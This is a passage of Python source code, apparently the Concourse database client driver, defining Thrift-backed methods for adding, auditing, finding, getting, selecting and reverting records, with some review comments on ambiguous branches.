        # the .get() fallback), which reads stronger than the docstring's
        # "become the default" wording -- confirm intended precedence.
        self.host = prefs.get('host', host)
        self.port = int(prefs.get('port', port))
        self.username = prefs.get('username', username)
        self.password = prefs.get('password', password)
        self.environment = prefs.get('environment', environment)
        try:
            # Open a buffered thrift transport and authenticate immediately.
            transport = TSocket.TSocket(self.host, self.port)
            transport = TTransport.TBufferedTransport(transport)
            protocol = TBinaryProtocol.TBinaryProtocol(transport)
            self.client = ConcourseService.Client(protocol)
            transport.open()
            self.transport = transport
            self.__authenticate()
            # No transaction is running until one is explicitly staged.
            self.transaction = None
        except Thrift.TException:
            raise RuntimeError("Could not connect to the Concourse Server at "+self.host+":"+str(self.port))
def __authenticate(self):
""" Internal method to login with the username/password and locally store the AccessToken for use with
subsequent operations.
"""
try:
self.creds = self.client.login(self.username, self.password, self.environment)
except Thrift.TException as e:
raise e
def abort(self):
""" Abort the current transaction and discard any changes that were staged. After returning, the
driver will return to autocommit mode and all subsequent changes will be committed immediately.
"""
if self.transaction:
token = self.transaction
self.transaction = None
self.client.abort(self.creds, token, self.environment)
    def add(self, key, value, records=None, **kwargs):
        """ Add a a value to a key within a record if it does not exist.

        :param key: string
        :param value: object
        :param record: int (optional) or records: list (optional)
        :return: 1) a boolean that indicates whether the value was added, if a record is supplied 2) a dict mapping
        record to a boolean that indicates whether the value was added, if a list of records is supplied 3) the id of
        the new record where the data was added, if not record is supplied as an argument
        """
        # Convert to the thrift wire representation before dispatching.
        value = python_to_thrift(value)
        records = records or kwargs.get('record')
        if records is None:
            return self.client.addKeyValue(key, value, self.creds,
                                           self.transaction, self.environment)
        elif isinstance(records, list):
            return self.client.addKeyValueRecords(key, value, records,
                                                  self.creds, self.transaction, self.environment)
        elif isinstance(records, (int, long)):
            return self.client.addKeyValueRecord(key, value, records,
                                                 self.creds, self.transaction, self.environment)
        else:
            # NOTE(review): this branch is reached when 'records' is neither
            # None, a list, nor an int/long (e.g. a string), so the message
            # 'key and value' looks misleading -- confirm intended wording.
            require_kwarg('key and value')
    def audit(self, key=None, record=None, start=None, end=None, **kwargs):
        """ Return a log of revisions.

        :param key: string (optional) - restrict the audit to a single field
        :param record: int - the record to audit
        :param start: string|int (optional) - 'timestamp' is accepted as an alias
        :param end: string|int (optional)
        :return: a dict mapping a timestamp to a description of changes, in chronological order
        """
        start = start or find_in_kwargs_by_alias('timestamp', kwargs)
        # String timestamps are routed to the *str thrift endpoints, which
        # parse natural-language times on the server.
        startstr = isinstance(start, basestring)
        endstr = isinstance(end, basestring)
        # Allow audit(record) to be called with the record as the first
        # positional argument.
        if isinstance(key, int):
            record = key
            key = None
        if key and record and start and not startstr and end and not endstr:
            data = self.client.auditKeyRecordStartEnd(key, record, start, end, self.creds, self.transaction,
                                                      self.environment)
        elif key and record and start and startstr and end and endstr:
            data = self.client.auditKeyRecordStartstrEndstr(key, record, start, end, self.creds, self.transaction,
                                                            self.environment)
        elif key and record and start and not startstr:
            data = self.client.auditKeyRecordStart(key, record, start, self.creds, self.transaction, self.environment)
        elif key and record and start and startstr:
            data = self.client.auditKeyRecordStartstr(key, record, start, self.creds, self.transaction, self.environment)
        elif key and record:
            data = self.client.auditKeyRecord(key, record, self.creds, self.transaction, self.environment)
        elif record and start and not startstr and end and not endstr:
            data = self.client.auditRecordStartEnd(record, start, end, self.creds, self.transaction,
                                                   self.environment)
        elif record and start and startstr and end and endstr:
            data = self.client.auditRecordStartstrEndstr(record, start, end, self.creds, self.transaction,
                                                         self.environment)
        elif record and start and not startstr:
            data = self.client.auditRecordStart(record, start, self.creds, self.transaction, self.environment)
        elif record and start and startstr:
            data = self.client.auditRecordStartstr(record, start, self.creds, self.transaction, self.environment)
        elif record:
            data = self.client.auditRecord(record, self.creds, self.transaction, self.environment)
        else:
            require_kwarg('record')
        # Sort by timestamp so the log reads chronologically.
        data = OrderedDict(sorted(data.items()))
        return data
    def browse(self, keys=None, timestamp=None, **kwargs):
        """ Return a view of all the values indexed for a key or group of keys.

        :param key: string or keys: list
        :param timestamp: string|int (optional)
        :return: 1) a dict mapping a value to a set of records containing the value if a single key is specified or
        2) a dict mapping a key to a dict mapping a value to set of records containing that value if a list of keys
        is specified
        """
        keys = keys or kwargs.get('key')
        timestamp = timestamp or find_in_kwargs_by_alias('timestamp', kwargs)
        # String timestamps go to the *str endpoints for server-side parsing.
        timestamp_is_string = isinstance(timestamp, basestring)
        if isinstance(keys, list) and timestamp and not timestamp_is_string:
            data = self.client.browseKeysTime(keys, timestamp, self.creds, self.transaction, self.environment)
        elif isinstance(keys, list) and timestamp and timestamp_is_string:
            data = self.client.browseKeysTimestr(keys, timestamp, self.creds, self.transaction, self.environment)
        elif isinstance(keys, list):
            data = self.client.browseKeys(keys, self.creds, self.transaction, self.environment)
        elif timestamp and not timestamp_is_string:
            data = self.client.browseKeyTime(keys, timestamp, self.creds, self.transaction, self.environment)
        elif timestamp and timestamp_is_string:
            data = self.client.browseKeyTimestr(keys, timestamp, self.creds, self.transaction, self.environment)
        elif keys:
            data = self.client.browseKey(keys, self.creds, self.transaction, self.environment)
        else:
            require_kwarg('key or keys')
        # Convert thrift values back to native Python types.
        return pythonify(data)
    def chronologize(self, key, record, start=None, end=None, **kwargs):
        """ Return a chronological view that shows the state of a field (key/record) over a range of time.

        :param key: string
        :param record: int
        :param start: string|int (optional) - 'timestamp' is accepted as an alias
        :param end: string|int (optional)
        :return: the chronological view of the field over the specified (or entire) range of time
        """
        start = start or find_in_kwargs_by_alias('timestamp', kwargs)
        # String timestamps go to the *str endpoints for server-side parsing.
        startstr = isinstance(start, basestring)
        endstr = isinstance(end, basestring)
        if start and not startstr and end and not endstr:
            data = self.client.chronologizeKeyRecordStartEnd(key, record, start, end, self.creds, self.transaction,
                                                             self.environment)
        elif start and startstr and end and endstr:
            data = self.client.chronologizeKeyRecordStartstrEndstr(key, record, start, end, self.creds, self.transaction,
                                                                   self.environment)
        elif start and not startstr:
            data = self.client.chronologizeKeyRecordStart(key, record, start, self.creds, self.transaction,
                                                          self.environment)
        elif start and startstr:
            data = self.client.chronologizeKeyRecordStartstr(key, record, start, self.creds, self.transaction,
                                                             self.environment)
        else:
            data = self.client.chronologizeKeyRecord(key, record, self.creds, self.transaction, self.environment)
        # Sort by timestamp, then convert thrift values to Python types.
        data = OrderedDict(sorted(data.items()))
        return pythonify(data)
    def clear(self, keys=None, records=None, **kwargs):
        """ Atomically remove all the data from a field or an entire record.

        :param key: string or keys: list
        :param record: int or records: list
        """
        keys = keys or kwargs.get('key')
        records = records or kwargs.get('record')
        # Dispatch on the scalar/list shape of the key and record arguments.
        if isinstance(keys, list) and isinstance(records, list):
            return self.client.clearKeysRecords(keys, records, self.creds, self.transaction, self.environment)
        elif isinstance(records, list) and not keys:
            return self.client.clearRecords(records, self.creds, self.transaction, self.environment)
        elif isinstance(keys, list) and records:
            return self.client.clearKeysRecord(keys, records, self.creds, self.transaction, self.environment)
        elif isinstance(records, list) and keys:
            return self.client.clearKeyRecords(keys, records, self.creds, self.transaction, self.environment)
        elif keys and records:
            return self.client.clearKeyRecord(keys, records, self.creds, self.transaction, self.environment)
        elif records:
            return self.client.clearRecord(records, self.creds, self.transaction, self.environment)
        else:
            require_kwarg('record or records')
def commit(self):
""" Commit the currently running transaction.
:return: True if the transaction commits. Otherwise, False.
"""
token = self.transaction
self.transaction = None
if token:
return self.client.commit(self.creds, token, self.environment)
else:
return False
    def describe(self, records=None, timestamp=None, **kwargs):
        """ Return all keys in a record at the present or the specified timestamp.

        :param record: int or records: list
        :param timestamp: string|int (optional)
        :return: a set of keys if a single record is provided; if multiple records are provided, a mapping from
                 each record to its set of keys
        """
        timestamp = timestamp or find_in_kwargs_by_alias('timestamp', kwargs)
        # String timestamps go to the *str endpoints for server-side parsing.
        timestr = isinstance(timestamp, basestring)
        records = records or kwargs.get('record')
        if isinstance(records, list) and timestamp and not timestr:
            return self.client.describeRecordsTime(records, timestamp, self.creds, self.transaction, self.environment)
        elif isinstance(records, list) and timestamp and timestr:
            return self.client.describeRecordsTimestr(records, timestamp, self.creds, self.transaction, self.environment)
        elif isinstance(records, list):
            return self.client.describeRecords(records, self.creds, self.transaction, self.environment)
        elif timestamp and not timestr:
            return self.client.describeRecordTime(records, timestamp, self.creds, self.transaction, self.environment)
        elif timestamp and timestr:
            return self.client.describeRecordTimestr(records, timestamp, self.creds, self.transaction, self.environment)
        else:
            return self.client.describeRecord(records, self.creds, self.transaction, self.environment)
    def diff(self, key=None, record=None, start=None, end=None, **kwargs):
        """ Return the differences in a field, record or index from a start timestamp to an end timestamp.

        :param key: string (optional) - diff a single field (with record) or an index (without)
        :param record: int (optional) - diff a whole record when key is omitted
        :param start: string|int - 'timestamp' is accepted as an alias; required
        :param end: string|int (optional)
        :return: the differences over the given range
        """
        start = start or find_in_kwargs_by_alias('timestamp', kwargs)
        # String timestamps go to the *str endpoints for server-side parsing.
        startstr = isinstance(start, basestring)
        endstr = isinstance(end, basestring)
        if key and record and start and not startstr and end and not endstr:
            data = self.client.diffKeyRecordStartEnd(key, record, start, end, self.creds, self.transaction,
                                                     self.environment)
        elif key and record and start and startstr and end and endstr:
            data = self.client.diffKeyRecordStartstrEndstr(key, record, start, end, self.creds, self.transaction,
                                                           self.environment)
        elif key and record and start and not startstr:
            data = self.client.diffKeyRecordStart(key, record, start, self.creds, self.transaction, self.environment)
        elif key and record and start and startstr:
            data = self.client.diffKeyRecordStartstr(key, record, start, self.creds, self.transaction, self.environment)
        elif key and start and not startstr and end and not endstr:
            data = self.client.diffKeyStartEnd(key, start, end, self.creds, self.transaction, self.environment)
        elif key and start and startstr and end and endstr:
            data = self.client.diffKeyStartstrEndstr(key, start, end, self.creds, self.transaction, self.environment)
        elif key and start and not startstr:
            data = self.client.diffKeyStart(key, start, self.creds, self.transaction, self.environment)
        elif key and start and startstr:
            data = self.client.diffKeyStartstr(key, start, self.creds, self.transaction, self.environment)
        elif record and start and not startstr and end and not endstr:
            data = self.client.diffRecordStartEnd(record, start, end, self.creds, self.transaction, self.environment)
        elif record and start and startstr and end and endstr:
            data = self.client.diffRecordStartstrEndstr(record, start, end, self.creds, self.transaction,
                                                        self.environment)
        elif record and start and not startstr:
            data = self.client.diffRecordStart(record, start, self.creds, self.transaction, self.environment)
        elif record and start and startstr:
            data = self.client.diffRecordStartstr(record, start, self.creds, self.transaction, self.environment)
        else:
            require_kwarg('start and (record or key)')
        # Convert thrift values back to native Python types.
        return pythonify(data)
    def close(self):
        """ Close the connection.

        Alias for :meth:`exit`: logs the session out of the server and shuts
        down the underlying transport.
        """
        self.exit()
    def exit(self):
        """ Close the connection.

        Logs the current session out of the server, then closes the thrift
        transport. The client cannot be used after this is called.
        """
        self.client.logout(self.creds, self.environment)
        self.transport.close()
    def find(self, criteria=None, **kwargs):
        """ Find the records that match either a CCL *criteria* string or a
        key/operator/value(s) combination, optionally at a historical
        timestamp.

        :param criteria: a CCL criteria string (alias kwarg: 'criteria')
        :param kwargs: 'key', 'operator', 'value'/'values', and an optional
            'timestamp' (a numeric value or a natural-language string)
        :return: the matching record ids (sets are converted to lists)
        """
        criteria = criteria or find_in_kwargs_by_alias('criteria', kwargs)
        key = kwargs.get('key')
        operator = kwargs.get('operator')
        # The *str flags select the natural-language ("str") thrift variants.
        operatorstr = isinstance(operator, basestring)
        values = kwargs.get('value') or kwargs.get('values')
        values = [values] if not isinstance(values, list) else values
        values = thriftify(values)
        timestamp = find_in_kwargs_by_alias('timestamp', kwargs)
        timestr = isinstance(timestamp, basestring)
        # Dispatch to the thrift method that matches the exact argument
        # combination; a CCL criteria takes precedence over everything else.
        if criteria:
            data = self.client.findCcl(criteria, self.creds, self.transaction, self.environment)
        elif key and operator and not operatorstr and values and not timestamp:
            data = self.client.findKeyOperatorValues(key, operator, values, self.creds, self.transaction,
                                                     self.environment)
        elif key and operator and operatorstr and values and not timestamp:
            data = self.client.findKeyOperatorstrValues(key, operator, values, self.creds, self.transaction,
                                                        self.environment)
        elif key and operator and not operatorstr and values and timestamp and not timestr:
            data = self.client.findKeyOperatorValuesTime(key, operator, values, timestamp, self.creds, self.transaction,
                                                         self.environment)
        elif key and operator and operatorstr and values and timestamp and not timestr:
            data = self.client.findKeyOperatorstrValuesTime(key, operator, values, timestamp, self.creds,
                                                            self.transaction, self.environment)
        elif key and operator and not operatorstr and values and timestamp and timestr:
            data = self.client.findKeyOperatorValuesTimestr(key, operator, values, timestamp, self.creds,
                                                            self.transaction, self.environment)
        elif key and operator and operatorstr and values and timestamp and timestr:
            data = self.client.findKeyOperatorstrValuesTimestr(key, operator, values, timestamp, self.creds,
                                                               self.transaction, self.environment)
        else:
            require_kwarg('criteria or all of (key, operator and value/s)')
        data = list(data) if isinstance(data, set) else data
        return data
    def find_or_add(self, key, value):
        """ Atomically find the record where *key* equals *value* or, if none
        exists, add the key/value pair to a new record.

        :param key: the field name
        :param value: the value to look for (converted to its thrift form)
        :return: the server's result for the find-or-add operation
        """
        value = python_to_thrift(value)
        return self.client.findOrAddKeyValue(key, value, self.creds, self.transaction, self.environment)
def find_or_insert(self, criteria=None, data=None, **kwargs):
"""
:param criteria:
:param data:
:param kwargs:
:return:
"""
data = data or kwargs.get('json')
if isinstance(data, dict) or isinstance(data, list):
data = ujson.dumps(data)
criteria = criteria or find_in_kwargs_by_alias('criteria', kwargs)
return self.client.findOrInsertCclJson(criteria, data, self.creds, self.transaction, self.environment)
    def get(self, keys=None, criteria=None, records=None, timestamp=None, **kwargs):
        """ Get the most recently added value(s) for the specified key(s) in
        the specified record(s), or for the records that match a CCL
        criteria, optionally at a historical timestamp.

        :param keys: a key or list of keys (alias kwarg: 'key')
        :param criteria: a CCL criteria string (alias kwarg: 'criteria')
        :param records: a record id or list of record ids (alias kwarg:
            'record')
        :param timestamp: an optional point in time, either a numeric value
            or a natural-language string (alias kwarg: 'timestamp')
        :return: the fetched data, converted to python values
        """
        criteria = criteria or find_in_kwargs_by_alias('criteria', kwargs)
        keys = keys or kwargs.get('key')
        records = records or kwargs.get('record')
        timestamp = timestamp or find_in_kwargs_by_alias('timestamp', kwargs)
        timestr = isinstance(timestamp, basestring)
        # Handle the case when kwargs are not used and the second positional
        # argument is actually the record(s) (e.g. get(key, record)).
        if (isinstance(criteria, int) or isinstance(criteria, list)) and not records:
            records = criteria
            criteria = None
        # Dispatch to the thrift method matching the exact argument
        # combination; branch order matters because later branches assume the
        # earlier, more specific ones did not match.
        if isinstance(records, list) and not keys and not timestamp:
            data = self.client.getRecords(records, self.creds, self.transaction, self.environment)
        elif isinstance(records, list) and timestamp and not timestr and not keys:
            data = self.client.getRecordsTime(records, timestamp, self.creds, self.transaction, self.environment)
        elif isinstance(records, list) and timestamp and timestr and not keys:
            data = self.client.getRecordsTimestr(records, timestamp, self.creds, self.transaction, self.environment)
        elif isinstance(records, list) and isinstance(keys, list) and not timestamp:
            data = self.client.getKeysRecords(keys, records, self.creds, self.transaction, self.environment)
        elif isinstance(records, list) and isinstance(keys, list) and timestamp and not timestr:
            data = self.client.getKeysRecordsTime(keys, records, timestamp, self.creds, self.transaction,
                                                  self.environment)
        elif isinstance(records, list) and isinstance(keys, list) and timestamp and timestr:
            data = self.client.getKeysRecordsTimestr(keys, records, timestamp, self.creds, self.transaction,
                                                     self.environment)
        elif isinstance(keys, list) and criteria and not timestamp:
            data = self.client.getKeysCcl(keys, criteria, self.creds, self.transaction, self.environment)
        elif isinstance(keys, list) and criteria and timestamp and not timestr:
            data = self.client.getKeysCclTime(keys, criteria, timestamp, self.creds, self.transaction, self.environment)
        elif isinstance(keys, list) and criteria and timestamp and timestr:
            data = self.client.getKeysCclTimestr(keys, criteria, timestamp, self.creds, self.transaction,
                                                 self.environment)
        elif isinstance(keys, list) and records and not timestamp:
            data = self.client.getKeysRecord(keys, records, self.creds, self.transaction, self.environment)
        elif isinstance(keys, list) and records and timestamp and not timestr:
            data = self.client.getKeysRecordTime(keys, records, timestamp, self.creds, self.transaction,
                                                 self.environment)
        elif isinstance(keys, list) and records and timestamp and timestr:
            data = self.client.getKeysRecordTimestr(keys, records, timestamp, self.creds, self.transaction,
                                                    self.environment)
        elif criteria and not keys and not timestamp:
            data = self.client.getCcl(criteria, self.creds, self.transaction, self.environment)
        elif criteria and timestamp and not timestr and not keys:
            data = self.client.getCclTime(criteria, timestamp, self.creds, self.transaction, self.environment)
        elif criteria and timestamp and timestr and not keys:
            data = self.client.getCclTimestr(criteria, timestamp, self.creds, self.transaction, self.environment)
        elif records and not keys and not timestamp:
            data = self.client.getRecord(records, self.creds, self.transaction, self.environment)
        elif records and timestamp and not timestr and not keys:
            data = self.client.getRecordsTime(records, timestamp, self.creds, self.transaction, self.environment)
        elif records and timestamp and timestr and not keys:
            data = self.client.getRecordsTimestr(records, timestamp, self.creds, self.transaction, self.environment)
        elif keys and criteria and not timestamp:
            data = self.client.getKeyCcl(keys, criteria, self.creds, self.transaction, self.environment)
        elif keys and criteria and timestamp and not timestr:
            data = self.client.getKeyCclTime(keys, criteria, timestamp, self.creds, self.transaction,
                                             self.environment)
        elif keys and criteria and timestamp and timestr:
            data = self.client.getKeyCclTimestr(keys, criteria, timestamp, self.creds, self.transaction,
                                                self.environment)
        elif keys and isinstance(records, list) and not timestamp:
            data = self.client.getKeyRecords(keys, records, self.creds, self.transaction, self.environment)
        elif keys and records and not timestamp:
            data = self.client.getKeyRecord(keys, records, self.creds, self.transaction, self.environment)
        elif keys and isinstance(records, list) and timestamp and not timestr:
            data = self.client.getKeyRecordsTime(keys, records, timestamp, self.creds, self.transaction,
                                                 self.environment)
        elif keys and isinstance(records, list) and timestamp and timestr:
            data = self.client.getKeyRecordsTimestr(keys, records, timestamp, self.creds, self.transaction,
                                                    self.environment)
        elif keys and records and timestamp and not timestr:
            data = self.client.getKeyRecordTime(keys, records, timestamp, self.creds, self.transaction,
                                                self.environment)
        elif keys and records and timestamp and timestr:
            data = self.client.getKeyRecordTimestr(keys, records, timestamp, self.creds, self.transaction,
                                                   self.environment)
        else:
            require_kwarg('criteria or (key and record)')
        return pythonify(data)
    def get_server_environment(self):
        """ Return the environment to which the client is connected.

        :return: the name of the connected server environment
        """
        return self.client.getServerEnvironment(self.creds, self.transaction, self.environment)
    def get_server_version(self):
        """ Return the version of Concourse Server to which the client is
        connected. Generally speaking, a client cannot talk to a newer
        version of Concourse Server.

        :return: the server version string
        """
        return self.client.getServerVersion()
def insert(self, data, records=None, **kwargs):
""" Bulk insert data from a dict, a list of dicts or a JSON string. This operation is atomic, within each record.
An insert can only succeed within a record if all the data can be successfully added, which means the insert
will fail if any aspect of the data already exists in the record.
If no record or records are specified, the following behaviour occurs
- data is a dict or a JSON object:
The data is inserted into a new record
- data is a list of dicts or a JSON array of objects:
Each dict/object is inserted into a new record
If a record or records are specified, the data must be a JSON object or a dict. In this case, the object/dict is
inserted into every record specified as an argument to the function.
:param data (dict | list | string):
:param record (int) or records(list):
:return: the list of records into which data was inserted, if no records are specified as method arguments.
Otherwise, a bool indicating whether the insert was successful if a single record is specified as an argument
or a dict mapping each specified record to a bool that indicates whether the insert was successful for that
record
"""
data = data or kwargs.get('json')
records = records or kwargs.get('record')
if isinstance(data, dict) or isinstance(data, list):
data = ujson.dumps(data)
if isinstance(records, list):
result = self.client.insertJsonRecords(data, records, self.creds, self.transaction, self.environment)
elif records:
result = self.client.insertJsonRecord(data, records, self.creds, self.transaction, self.environment)
else:
result = self.client.insertJson(data, self.creds, self.transaction, self.environment)
result = list(result) if isinstance(result, set) else result
return result
def inventory(self):
""" Return a list of all the records that have any data.
:return: the inventory
"""
data = self.client.inventory(self.creds, self.transaction, self.environment)
return list(data) if isinstance(data, set) else data
def jsonify(self, records=None, include_id=False, timestamp=None, **kwargs):
"""
:param records:
:param include_id:
:param timestamp:
:param kwargs:
:return:
"""
records = records or kwargs.get('record')
records = list(records) if not isinstance(records, list) else records
timestamp = timestamp or find_in_kwargs_by_alias('timestamp', kwargs)
include_id = include_id or kwargs.get('id', False)
timestr = isinstance(timestamp, basestring)
if not timestamp:
return self.client.jsonifyRecords(records, include_id, self.creds, self.transaction, self.environment)
elif timestamp and not timestr:
return self.client.jsonifyRecordsTime(records, timestamp, include_id, self.creds, self.transaction,
self.environment)
elif timestamp and timestr:
return self.client.jsonifyRecordsTimestr(records, timestamp, include_id, self.creds, self.transaction,
self.environment)
else:
require_kwarg('record or records')
def link(self, key, source, destinations=None, **kwargs):
"""
:param key:
:param source:
:param destinations:
:param destination:
:return:
"""
destinations = destinations or kwargs.get('destination')
if not isinstance(destinations, list):
return self.add(key, Link.to(destinations), source)
else:
data = dict()
for dest in destinations:
data[dest] = self.add(key, Link.to(dest), source)
return data
    def logout(self):
        """ Invalidate the current access token on the server.

        Unlike :meth:`exit`, this does not close the underlying transport.
        """
        self.client.logout(self.creds, self.environment)
def ping(self, records, **kwargs):
"""
:param records:
:return:
"""
records = records or kwargs.get('record')
if isinstance(records, list):
return self.client.pingRecords(records, self.creds, self.transaction, self.environment)
else:
return self.client.pingRecord(records, self.creds, self.transaction, self.environment)
def remove(self, key, value, records=None, **kwargs):
"""
:param key:
:param value:
:param records:
:return:
"""
value = python_to_thrift(value)
records = records or kwargs.get('record')
if isinstance(records, list):
return self.client.removeKeyValueRecords(key, value, records, self.creds, self.transaction,
self.environment)
elif isinstance(records, (int, long)):
return self.client.removeKeyValueRecord(key, value, records, self.creds, self.transaction, self.environment)
else:
require_kwarg('record or records')
    def revert(self, keys=None, records=None, timestamp=None, **kwargs):
        """ Revert the specified key(s) in the specified record(s) to their
        state at *timestamp*.

        :param keys: a key or list of keys (alias kwarg: 'key')
        :param records: a record id or list of record ids (alias kwarg:
            'record')
        :param timestamp: the point in time to revert to, either a numeric
            value or a natural-language string (alias kwarg: 'timestamp')
        :return: None
        """
        keys = keys or kwargs.get('key')
        records = records or kwargs.get('record')
        timestamp = timestamp or find_in_kwargs_by_alias('timestamp', kwargs)
        timestr = isinstance(timestamp, basestring)
        # Dispatch on keys/records plurality and on whether the timestamp is
        # numeric or a natural-language string.
        if isinstance(keys, list) and isinstance(records, list) and timestamp and not timestr:
            self.client.revertKeysRecordsTime(keys, records, timestamp, self.creds, self.transaction, self.environment)
        elif isinstance(keys, list) and isinstance(records, list) and timestamp and timestr:
            self.client.revertKeysRecordsTimestr(keys, records, timestamp, self.creds, self.transaction,
                                                 self.environment)
        elif isinstance(keys, list) and records and timestamp and not timestr:
            self.client.revertKeysRecordTime(keys, records, timestamp, self.creds, self.transaction, self.environment)
        elif isinstance(keys, list) and records and timestamp and timestr:
            self.client.revertKeysRecordTimestr(keys, records, timestamp, self.creds, self.transaction, self.environment)
        elif isinstance(records, list) and keys and timestamp and not timestr:
            self.client.revertKeyRecordsTime(keys, records, timestamp, self.creds, self.transaction, self.environment)
        elif isinstance(records, list) and keys and timestamp and timestr:
            self.client.revertKeyRecordsTimestr(keys, records, timestamp, self.creds, self.transaction, self.environment)
        elif keys and records and timestamp and not timestr:
            self.client.revertKeyRecordTime(keys, records, timestamp, self.creds, self.transaction, self.environment)
        elif keys and records and timestamp and timestr:
            self.client.revertKeyRecordTimestr(keys, records, timestamp, self.creds, self.transaction, self.environment)
        else:
            require_kwarg('keys, record and timestamp')
def search(self, key, query):
"""
:param key:
:param query:
:return:
"""
data = self.client.search(key, query, self.creds, self.transaction, self.environment)
data = list(data) if isinstance(data, set) else data
return data
    def select(self, keys=None, criteria=None, records=None, timestamp=None, **kwargs):
        """ Select all the values for the specified key(s) in the specified
        record(s), or in the records that match a CCL criteria, optionally at
        a historical timestamp.

        :param keys: a key or list of keys (alias kwarg: 'key')
        :param criteria: a CCL criteria string (alias kwarg: 'criteria')
        :param records: a record id or list of record ids (alias kwarg:
            'record')
        :param timestamp: an optional point in time, either a numeric value
            or a natural-language string (alias kwarg: 'timestamp')
        :return: the selected data, converted to python values
        """
        criteria = criteria or find_in_kwargs_by_alias('criteria', kwargs)
        keys = keys or kwargs.get('key')
        records = records or kwargs.get('record')
        timestamp = timestamp or find_in_kwargs_by_alias('timestamp', kwargs)
        timestr = isinstance(timestamp, basestring)
        # Handle the case when kwargs are not used and the second positional
        # argument is actually the record(s) (e.g. select(key, record)).
        if (isinstance(criteria, int) or isinstance(criteria, list)) and not records:
            records = criteria
            criteria = None
        # Dispatch on the exact argument combination; branch order matters
        # because later branches assume earlier, more specific ones failed.
        if isinstance(records, list) and not keys and not timestamp:
            data = self.client.selectRecords(records, self.creds, self.transaction, self.environment)
        elif isinstance(records, list) and timestamp and not timestr and not keys:
            data = self.client.selectRecordsTime(records, timestamp, self.creds, self.transaction, self.environment)
        elif isinstance(records, list) and timestamp and timestr and not keys:
            data = self.client.selectRecordsTimestr(records, timestamp, self.creds, self.transaction, self.environment)
        elif isinstance(records, list) and isinstance(keys, list) and not timestamp:
            data = self.client.selectKeysRecords(keys, records, self.creds, self.transaction, self.environment)
        elif isinstance(records, list) and isinstance(keys, list) and timestamp and not timestr:
            data = self.client.selectKeysRecordsTime(keys, records, timestamp, self.creds, self.transaction,
                                                     self.environment)
        elif isinstance(records, list) and isinstance(keys, list) and timestamp and timestr:
            data = self.client.selectKeysRecordsTimestr(keys, records, timestamp, self.creds, self.transaction,
                                                        self.environment)
        elif isinstance(keys, list) and criteria and not timestamp:
            data = self.client.selectKeysCcl(keys, criteria, self.creds, self.transaction, self.environment)
        elif isinstance(keys, list) and criteria and timestamp and not timestr:
            data = self.client.selectKeysCclTime(keys, criteria, timestamp, self.creds, self.transaction,
                                                 self.environment)
        elif isinstance(keys, list) and criteria and timestamp and timestr:
            data = self.client.selectKeysCclTimestr(keys, criteria, timestamp, self.creds, self.transaction,
                                                    self.environment)
        elif isinstance(keys, list) and records and not timestamp:
            data = self.client.selectKeysRecord(keys, records, self.creds, self.transaction, self.environment)
        elif isinstance(keys, list) and records and timestamp and not timestr:
            data = self.client.selectKeysRecordTime(keys, records, timestamp, self.creds, self.transaction,
                                                    self.environment)
        elif isinstance(keys, list) and records and timestamp and timestr:
            data = self.client.selectKeysRecordTimestr(keys, records, timestamp, self.creds, self.transaction,
                                                       self.environment)
        elif criteria and not keys and not timestamp:
            data = self.client.selectCcl(criteria, self.creds, self.transaction, self.environment)
        elif criteria and timestamp and not timestr and not keys:
            data = self.client.selectCclTime(criteria, timestamp, self.creds, self.transaction, self.environment)
        elif criteria and timestamp and timestr and not keys:
            data = self.client.selectCclTimestr(criteria, timestamp, self.creds, self.transaction, self.environment)
        elif records and not keys and not timestamp:
            data = self.client.selectRecord(records, self.creds, self.transaction, self.environment)
        elif records and not isinstance(records, list) and timestamp and not timestr and not keys:
            data = self.client.selectRecordTime(records, timestamp, self.creds, self.transaction, self.environment)
        elif records and timestamp and not timestr and not keys:
            data = self.client.selectRecordsTime(records, timestamp, self.creds, self.transaction, self.environment)
        elif records and not isinstance(records, list) and timestamp and timestr and not keys:
            data = self.client.selectRecordTimestr(records, timestamp, self.creds, self.transaction, self.environment)
        elif isinstance(records, list) and timestamp and timestr and not keys:
            data = self.client.selectRecordsTimestr(records, timestamp, self.creds, self.transaction, self.environment)
        elif keys and criteria and not timestamp:
            data = self.client.selectKeyCcl(keys, criteria, self.creds, self.transaction, self.environment)
        elif keys and criteria and timestamp and not timestr:
            data = self.client.selectKeyCclTime(keys, criteria, timestamp, self.creds, self.transaction,
                                                self.environment)
        elif keys and criteria and timestamp and timestr:
            data = self.client.selectKeyCclTimestr(keys, criteria, timestamp, self.creds, self.transaction,
                                                   self.environment)
        elif keys and isinstance(records, list) and not timestamp:
            data = self.client.selectKeyRecords(keys, records, self.creds, self.transaction, self.environment)
        elif keys and records and not timestamp:
            data = self.client.selectKeyRecord(keys, records, self.creds, self.transaction, self.environment)
        elif keys and isinstance(records, list) and timestamp and not timestr:
            data = self.client.selectKeyRecordsTime(keys, records, timestamp, self.creds, self.transaction,
                                                    self.environment)
        elif keys and isinstance(records, list) and timestamp and timestr:
            data = self.client.selectKeyRecordsTimestr(keys, records, timestamp, self.creds, self.transaction,
                                                       self.environment)
        elif keys and records and timestamp and not timestr:
            data = self.client.selectKeyRecordTime(keys, records, timestamp, self.creds, self.transaction,
                                                   self.environment)
        elif keys and records and timestamp and timestr:
            data = self.client.selectKeyRecordTimestr(keys, records, timestamp, self.creds, self.transaction,
                                                      self.environment)
        # NOTE(review): the remaining record-only branches appear to duplicate
        # earlier branches and look unreachable; left intact pending
        # confirmation against the full test suite.
        elif records and not isinstance(records, list) and not timestamp:
            data = self.client.selectRecord(records, self.creds, self.transaction, self.environment)
        elif records and not isinstance(records, list) and timestamp and not timestr:
            data = self.client.selectRecordTime(records, timestamp, self.creds, self.transaction, self.environment)
        elif records and not isinstance(records, list) and timestamp and timestr:
            data = self.client.selectRecordTimestr(records, timestamp, self.creds, self.transaction, self.environment)
        elif records and not timestamp:
            data = self.client.selectRecords(records, self.creds, self.transaction, self.environment)
        elif records and timestamp and not timestr:
            data = self.client.selectRecordsTime(records, timestamp, self.creds, self.transaction, self.environment)
        elif records and timestamp and timestr:
            data = self.client.selectRecordsTimestr(records, timestamp, self.creds, self.transaction, self.environment)
        else:
            require_kwarg('criteria or record')
        return pythonify(data)
    def set(self, key, value, records=None, **kwargs):
        """ Atomically make *value* the data stored for *key*, either in a
        new record or in each of the specified record(s).

        :param key: the field name
        :param value: the value to store (converted to its thrift form)
        :param records: a record id (int/long) or a list of record ids (alias
            kwarg: 'record'); when omitted the value goes into a new record
        :return: the new record id when no record is given; otherwise None
        """
        records = records or kwargs.get('record')
        value = python_to_thrift(value)
        if not records:
            return self.client.setKeyValue(key, value, self.creds, self.transaction, self.environment)
        elif isinstance(records, list):
            self.client.setKeyValueRecords(key, value, records, self.creds, self.transaction, self.environment)
